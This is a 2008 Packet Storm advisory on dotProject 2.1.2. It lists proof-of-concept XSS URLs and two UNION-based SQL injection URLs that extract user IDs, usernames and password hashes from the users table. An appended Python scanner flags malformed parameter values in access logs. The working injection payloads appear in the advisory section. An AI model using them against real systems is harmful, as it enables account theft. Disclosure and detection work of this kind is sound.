dotproject-sqlxss.txt

2008-08-29T00:00:00
ID PACKETSTORM:69468
Type packetstorm
Reporter C1c4Tr1Z
Modified 2008-08-29T00:00:00

Description

                                        
                                            `#=======================================================================#  
(http://wwwlowsec.org)  
#========================================================================#  
Author: C1c4Tr1Z  
Date: 28/08/08  
Application: dotProject 2.1.2 (29/06/2008)  
Product WebSite: http://www.dotproject.net/  
  
(*) With some of these exploits you need an ADMIN/ANONYMOUS account  
(*) I think that this project might be vulnerable to Cross-Site Request Forgery  
  
#========================================================================#  
#=============================[XSS]======================================#  
  
POC:  
/index.php?m=tasks&inactive=toggle"><img/src/onerror=alert(0)>  
/index.php?m=calendar&a=day_view&date=20080828"><img/src/onerror=alert(0)>  
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"><img/src/onerror=alert(0)>  
/index.php?m=ticketsmith&type=My'><img/src/onerror=alert(0)>  
  
#========================================================================#  
#=============================[SQL]======================================#  
  
POC as "ADMIN":  
  
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users  
  
POC as "ANONYMOUS" or other:  
  
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--  
  
#========================================================================#  
#========================================================================#  
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>  
(http://wwwlowsec.org)  
LowSec! Web Application Security (Lab).  
Deus ex Machina  
#========================================================================#  
`
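
Added example (not part of the original advisory and not dotProject code): a defensive check that flags access-log requests in which one of the parameters named above (inactive, date, callback, type, user_id, tab) carries a value outside its expected shape. The expected shapes are assumptions inferred from the benign part of each PoC URL, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Expected value shape for each parameter named in the advisory.
# Assumption: shapes are inferred from the benign prefix of each PoC URL,
# not taken from dotProject's source.
EXPECTED = {
    "user_id": re.compile(r"-?\d+"),            # numeric id
    "tab": re.compile(r"-?\d+"),                # numeric tab index (-1 is used)
    "date": re.compile(r"\d{8}"),               # YYYYMMDD
    "inactive": re.compile(r"[A-Za-z_]+"),      # keyword such as "toggle"
    "callback": re.compile(r"[A-Za-z_]\w*"),    # JavaScript identifier
    "type": re.compile(r"[A-Za-z ]+"),          # ticket filter such as "My"
}
# Request line inside a common/combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def violations(request_target):
    """Return sorted names of watched parameters whose decoded value is malformed."""
    bad = set()
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        pattern = EXPECTED.get(name)
        if pattern is not None and not pattern.fullmatch(value):
            bad.add(name)
    return sorted(bad)


def scan(log_lines):
    """Return (line number, offending parameter names) for each flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and (bad := violations(match.group(1))):
            hits.append((number, bad))
    return hits


# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Aug/2008:10:00:01 +0000] "GET /index.php?m=tasks&inactive=toggle HTTP/1.1" 200 5120',
    '192.0.2.44 - - [29/Aug/2008:10:00:07 +0000] "GET /index.php?m=projects&tab=-1%20UNION%20SELECT%201,2 HTTP/1.1" 200 7311',
    '192.0.2.44 - - [29/Aug/2008:10:00:09 +0000] "GET /index.php?m=ticketsmith&type=My%27%3E%3Cimg%3E HTTP/1.1" 200 4090',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: malformed parameter(s): {', '.join(names)}")
```

The same allow-list shapes can be enforced server-side before the values reach a query or the page output; matching on expected shape rather than on attack strings avoids chasing encodings.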